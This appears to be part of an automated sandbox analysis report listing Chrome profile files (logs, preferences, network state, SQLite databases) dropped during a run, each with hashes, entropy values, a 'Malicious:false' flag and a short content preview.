                                                                                                                                                MD5:647AC9965A71591C224C5EFF662A5EC4
                                                                                                                                                SHA1:566B28A50B3159789A62B811842500274A9D3611
                                                                                                                                                SHA-256:AD79970F9BECA6486DDEBB9AEDD6139F616433DF2B6A39DAEA4C559CF6AFF6EA
                                                                                                                                                SHA-512:29F8F13DBF8D7AB3E51C39A390866C7B5728B7FBD12E275ED27679D8536205292A974DD368FDD690D59003DDCF2A52EF343865D0F53B49FCA6DBED8DA4A0A82B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:43.804 1f24 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2021/10/29-14:10:43.805 1f24 Recovering log #3.2021/10/29-14:10:43.805 1f24 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):358
                                                                                                                                                Entropy (8bit):5.235089548406038
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRWmT4q2PWXp+N23iKKdK25+XuoIFUtnEeRWmtJZmwBEeRWjSDkwOWXp+N23B:pv94va5KkTXYFUtnvjJ/BvDD5f5KkTXp
                                                                                                                                                MD5:56EF95D882EBCEC3586A7B36280E7B1D
                                                                                                                                                SHA1:69BA65F59A0BAF574B0B5C9D8C9722FACB9F1AC8
                                                                                                                                                SHA-256:FEA122246C951A3D386C8D328ED6D651438CFFF449AA2900EF4C17B593DBB35A
                                                                                                                                                SHA-512:A21F8E1F6A9BA052541739087B1CBDE98AB372239186D83863347AD29B618EBF3ED23ECA32AD6BBED4B67BE62265523468C699C34283180FD8C2CCC3DE6540A0
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:43.796 1f24 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/MANIFEST-000001.2021/10/29-14:10:43.798 1f24 Recovering log #3.2021/10/29-14:10:43.800 1f24 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.oldMS (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):358
                                                                                                                                                Entropy (8bit):5.235089548406038
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRWmT4q2PWXp+N23iKKdK25+XuoIFUtnEeRWmtJZmwBEeRWjSDkwOWXp+N23B:pv94va5KkTXYFUtnvjJ/BvDD5f5KkTXp
                                                                                                                                                MD5:56EF95D882EBCEC3586A7B36280E7B1D
                                                                                                                                                SHA1:69BA65F59A0BAF574B0B5C9D8C9722FACB9F1AC8
                                                                                                                                                SHA-256:FEA122246C951A3D386C8D328ED6D651438CFFF449AA2900EF4C17B593DBB35A
                                                                                                                                                SHA-512:A21F8E1F6A9BA052541739087B1CBDE98AB372239186D83863347AD29B618EBF3ED23ECA32AD6BBED4B67BE62265523468C699C34283180FD8C2CCC3DE6540A0
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:43.796 1f24 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/MANIFEST-000001.2021/10/29-14:10:43.798 1f24 Recovering log #3.2021/10/29-14:10:43.800 1f24 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):5.270914232365926
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRWfL4q2PWXp+N23iKKdKWT5g1IdqIFUtnEeRW6LJZmwBEeRWBbDkwOWXp+N4:pve4va5Kkg5gSRFUtnvZJ/BvUbD5f5Kg
                                                                                                                                                MD5:0FB81C78FB820C8320909DCF5CF3B43A
                                                                                                                                                SHA1:35E57E72C84512466ADB1506D2B65BAEB551E023
                                                                                                                                                SHA-256:2A37399DBE5FE2AEC984D072696CA3688A7A90EB125D3348B6BBBD67163F920C
                                                                                                                                                SHA-512:65A641930907EBF8217B1A7A1FE42CBF5CD796658D8B32F34D0AAB01A870302D79E17FBD16A8BAF9DD5A647FF2DB592507EB46B8CE4BE2A6005C8C8DE94A9C6E
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:43.696 1f24 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/10/29-14:10:43.697 1f24 Recovering log #3.2021/10/29-14:10:43.698 1f24 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG.old (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):330
                                                                                                                                                Entropy (8bit):5.270914232365926
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRWfL4q2PWXp+N23iKKdKWT5g1IdqIFUtnEeRW6LJZmwBEeRWBbDkwOWXp+N4:pve4va5Kkg5gSRFUtnvZJ/BvUbD5f5Kg
                                                                                                                                                MD5:0FB81C78FB820C8320909DCF5CF3B43A
                                                                                                                                                SHA1:35E57E72C84512466ADB1506D2B65BAEB551E023
                                                                                                                                                SHA-256:2A37399DBE5FE2AEC984D072696CA3688A7A90EB125D3348B6BBBD67163F920C
                                                                                                                                                SHA-512:65A641930907EBF8217B1A7A1FE42CBF5CD796658D8B32F34D0AAB01A870302D79E17FBD16A8BAF9DD5A647FF2DB592507EB46B8CE4BE2A6005C8C8DE94A9C6E
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:43.696 1f24 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/10/29-14:10:43.697 1f24 Recovering log #3.2021/10/29-14:10:43.698 1f24 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3007
                                                                                                                                                Entropy (8bit):6.085856219048523
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:MYtYS6542D/rUPgdiGpqbZ7xPbD4wXesKsSPwm3Ublpu4KinJIQPu4KWx0HP2PuM:nt/6542D/UgojjPTeAMDUbl1KyJIQrKu
                                                                                                                                                MD5:99FE901287E08CE0B86EC5CE26DCCC49
                                                                                                                                                SHA1:AFAB5CB3FFCB646B38EE78D1918C89321E368EBD
                                                                                                                                                SHA-256:2AB9B6FF7AA534DEF87345363536C6FAF9B6E01A67739294870D5FAE4AB5A54B
                                                                                                                                                SHA-512:7EF515D3AF1524831706645DF9A2181440067BA10FC43770F6E5F497BE5060525C69438F234F0A48E240384FD3950E27521776259E70B8924693C348870E04E6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: ............"......0..0009..0x409..11324..4.0.30319.0..4.5..6..applaunch2..application..aspnet..be..com..could..docs..exe..found..framework..fwlink..go..http..isserver..microsoft..net..not..noversion..null..o1..osver..platform..plcid..prd..processname..pver..sbp..shim..shimver..started..state..this..troubleshooting..version..dotnet..https..install..en..us*........0......0009......0x409......11324......4.0.30319.0......4.5......6......applaunch2......application......aspnet......be......com......could......docs......dotnet.)....en.,....exe......found......framework......fwlink......go......http......https.*....install.+....isserver......microsoft......net......not......noversion......null......o1......osver......platform......plcid......prd......processname......pver. ....sbp.!....shim."....shimver.#....started.$....state.%....this.&....troubleshooting.'....us.-....version.(2...................0...........1..........2.........3.........4...........5........6........9..........a........
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):8720
                                                                                                                                                Entropy (8bit):0.3283577581710296
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:xQ94/fMt76Y4QZVRtRex99pG/VTqR4EZY4QZv8fO1:A4nMWQA9L/BQZ8fO1
                                                                                                                                                MD5:790A5E6E8A4AD043F767BCCE64D5E13F
                                                                                                                                                SHA1:4FCF9A7FAD71EBD6F5CF6D85FBD8EC846D305DDF
                                                                                                                                                SHA-256:84A0564FE257C6F916767D3334607B8425BDF7D8BDAC729519AB3D7AAF7832F2
                                                                                                                                                SHA-512:1E741C52BA7858118F0D8FBEB41D5FE88BB88464C8FF2D6B752113620412D3499A3A5DD9419E5059DC717142F354C0D62B84DDEE5DCAAE70BCDC6C4722C89412
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: .......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Last Sessiono (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):13448
                                                                                                                                                Entropy (8bit):3.496787945228552
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:34gHv2EhZk9Sly2gLThZk9Q78l4I2gLhhZk9Q78lwg8R2pLchZxo7plWK2pLEhZG:3HnE/DC9PNWStdSG
                                                                                                                                                MD5:C9C2061CD45FF26018679E016E8F308F
                                                                                                                                                SHA1:775E768E6E959030005BB9C5766B013037878423
                                                                                                                                                SHA-256:E1C44F7A439CDBFF47343B478E2DA39FB8C4BFE73D16420BA5A59EAD5F6166E8
                                                                                                                                                SHA-512:D844220BA9297BE2B1DA3673B058AA466EDB386EDEC17B721586B8DC4FB3CA7D0ED65BE9123FF2290CE4E96E74E0D0FF8C1EA02A81701634F3A1C03EB9E1A0A7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: SNSS....................................................!.............................................1..,.......$...4325d4a0_5254_4d0f_a259_2eb450f69d61......................%...................................................................................5..0.......&...{AE32626E-B2F7-4664-89C4-2B2C2DB60905}........................!.............................................1..,.......$...2d3ff34f_df6a_4e93_8e40_05f7b18759b4......................y.....................................https://docs.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0......................................................h.......`.......................................................h..A....i..A............(...............................l.......h.t.t.p.s.:././.d.o.c.s...m.i.c.r.o.s.o.f.t...c.o.m./.e.n.-.u.s./.d.o.t.n.e.t./.f.r.a.m.e.w.o.r.k./.i.n.s.t.a.l.l./.a.p.p.l.i.c.a.t.i.o.n.-.n.o.t.-
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):36864
                                                                                                                                                Entropy (8bit):0.5102847836765736
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:Tbw/qALihje9kqL42WOT/9FUT+BwSfCAczwjDOIk:fOqAuhjspnWOvUT+BHKAcz5Ik
                                                                                                                                                MD5:383CFA774C903C6DC227EAD7C33DE1A8
                                                                                                                                                SHA1:C0EBB3958A3DD564A65FA5F543B162C76620F1A9
                                                                                                                                                SHA-256:B2320C476448462DC6006CC1F08ECA3DD30744943905CA32A6B9BC942C12138C
                                                                                                                                                SHA-512:095E2A8543DE9474A60A7CFCC08CE64610AB54C19E69EDF86EB7E62316061A17EEAAACFC738C82229A2A1CF70395288DA3862B3601054D67E10A2C224EA9BF87
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C.......,......\.t.+.>...,............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State. (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4219
                                                                                                                                                Entropy (8bit):4.871684703914691
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:YXsJjMH+5s7YMHBKsvxMHVzspxMHbsIHt/soBDysKqnsllzMHpDCLsWJMHLsNuMg:RG+ZGJG+GTTD7IGpD+G7Gp2GnG4GVhH
                                                                                                                                                MD5:EDC4A4E22003A711AEF67FAED28DB603
                                                                                                                                                SHA1:977E551B9ED5F60D018C030B0B4AA2E33B954556
                                                                                                                                                SHA-256:DD2C9F43F622F801FCC213CDE8E3E90EF1D0D26665AE675449A94CEC7EB1D453
                                                                                                                                                SHA-512:84D3930579FD73C7D86144D5CDC636436955BA79759273C740D2D72BC4847F2F7F165BBCA3EB2E4DFB01777D6A5F141623278C1BF74615C5A491092CE3FD1602
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248543677350473","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543677350474","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31344},"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31656},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501454993","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501454994","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39369},"server":"https://www.googleapis.com","supports_spdy":true},
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5193
                                                                                                                                                Entropy (8bit):4.979900818343623
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:n8pCFcqX9pcKI1Vok0JCKL8aPQkNNMkZpbOTQVuwn:n8pCFF9pcj04Kukv/
                                                                                                                                                MD5:F40CC1605A6D5FAD4929C5FEFF714C6B
                                                                                                                                                SHA1:0D4E880D4BDD0DDF03591242FF448FF9ACB60719
                                                                                                                                                SHA-256:C70C793088B14C73D04D05D4518B31C5734DF395AA4062D5D07F8E4CD1412D51
                                                                                                                                                SHA-512:DB058CD1700DAB2993DAC4A4D94E0AABE937A0D43E190C4211F4A6A21D5136AB5B1389A19D71C91EBA86915869739D1B76EF7E4E7101327E5603C1EA1142EC72
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13280015426034104","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):36864
                                                                                                                                                Entropy (8bit):0.7701922072347449
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:TUIopK2rJNVr1GJmm8pF82phrJNVrdHX/cjrJN2yJ1n4n1GmhGU1cEB/AlIoTRs5:wIElwQF8mpcSas/Al7sW53Cdfv1
                                                                                                                                                MD5:4C839CB756F3977AE4919050136908C0
                                                                                                                                                SHA1:37E09C0373575A74B728DBA090B91FD9D509DB30
                                                                                                                                                SHA-256:4ADCD04D296DD666A40878C409AF87E3489CDAD195C56880B45BCF0F1904A020
                                                                                                                                                SHA-512:03395D8245570BD9788D0078F27D888FD7BC9993518CCA9FB5CBF8C251018E74B3040226CD6310D248146D3E7C087919C8A28E25188EDE9E281637BC3E89C68A
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C..........g...^.........j............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences. (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16745
                                                                                                                                                Entropy (8bit):5.57736597591648
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:/cTtwLlG7Xk1kXqKf/pUZNCgVLH2HfDPrUdDLo4K:hLlAk1kXqKf/pUZNCgVLH2HfrrUBod
                                                                                                                                                MD5:C07E3F5EA2C2CC872B66432A983028A6
                                                                                                                                                SHA1:C5F107707761B9BCACF3F055267CC3FCB303312F
                                                                                                                                                SHA-256:5578698169AD8171E228B57F50FE7280EEBFE7E4896CC935AAEAFC16B8EB017C
                                                                                                                                                SHA-512:B59897A29DAD3A1BCB192CB8489825B9532D553C5820256AAA25EFE9B53CF5FFA5423AA0098EFE22C5CEB308A874CE858FAE08CFAB9213A24FB9B52D95C713C2
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13280015424813965","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences.. (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):17092
                                                                                                                                                Entropy (8bit):5.583181891141964
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:/cTtpLlG7Xk1kXqKf/pUZNCgVLH2HfDPrUPDLWo4h:WLlAk1kXqKf/pUZNCgVLH2HfrrUuoO
                                                                                                                                                MD5:FBB21F03F922068D76A443D7681BC18A
                                                                                                                                                SHA1:559BEFF9C85046840A57211712D2F54AE125D95B
                                                                                                                                                SHA-256:B20A825A2AF7FB06E581B754DCAD60260DD1329A2A6A355B8A0687D00D810F7A
                                                                                                                                                SHA-512:1C19F702C12476ED0DCD5FB569CF9A185C6818C878C3C5D8321D6D430B81B39AF5CB9BCED104A95AAA1279E236317D61A76301F6779E9B5449BE211CD10CE55B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13280015424813965","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):270336
                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent State (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):420
                                                                                                                                                Entropy (8bit):4.985305467053914
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:YHpoNXR8+eq7JdV5qQlsDHF4xj70PpqQEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3Ky:YHO8sdBsB6MAsBdLJlyH7E4f3K33y
                                                                                                                                                MD5:C401B619D9D8E0ADABC25A47EE49CFBA
                                                                                                                                                SHA1:C9D3B816DD3FBCD98E9C0A32CEC7B501EFC0BBDA
                                                                                                                                                SHA-256:8F5D75F5EF9876E8D30CE477509F735B50C4D87DBEDB433BE8EDBE6D4B3CB82F
                                                                                                                                                SHA-512:BC12F16CB95CB0AD708C6BBD005EF863A8552613E612F1084086E0F8262752E1B5144D044F0D141CE8462CC33343C36B517A5CC778751680485D8F88FB51B862
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543490879170","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543490879171","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\000003.log
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):80
                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: *...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\LOG
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):415
                                                                                                                                                Entropy (8bit):5.265905370390252
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRUyAq2PWXp+N23iKKdKusNpZQMxIFUtnEeRUbZmwBEeRU4kwOWXp+N23iKK+:pvyyAva5KkMFUtnvyb/Bvy45f5KkTJ
                                                                                                                                                MD5:D4586C20AA021CDF26D8393D5FDFC9A3
                                                                                                                                                SHA1:B10541B4CA058DB10D427CB68B0815C76CE652E5
                                                                                                                                                SHA-256:A9793BD0271D2953FA1F44CEB74A349F5384644528FC346AB141BD42D0BDDA2C
                                                                                                                                                SHA-512:4E8C83708D7AFEF6B59488A106CE3CF2C389E5EC11495BA113DEFECA9087E8A6CCD85C36F871A9D14FA412C617E54EECA6797AC00680FDA0CB59251F94D2EA09
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 2021/10/29-14:10:41.764 df0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/MANIFEST-000001.2021/10/29-14:10:41.765 df0 Recovering log #3.2021/10/29-14:10:41.766 df0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/000003.log .
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\LOG.oldos (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):415
                                                                                                                                                Entropy (8bit):5.265905370390252
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:maEeRUyAq2PWXp+N23iKKdKusNpZQMxIFUtnEeRUbZmwBEeRU4kwOWXp+N23iKK+:pvyyAva5KkMFUtnvyb/Bvy45f5KkTJ
                                                                                                                                                MD5:D4586C20AA021CDF26D8393D5FDFC9A3
                                                                                                                                                SHA1:B10541B4CA058DB10D427CB68B0815C76CE652E5
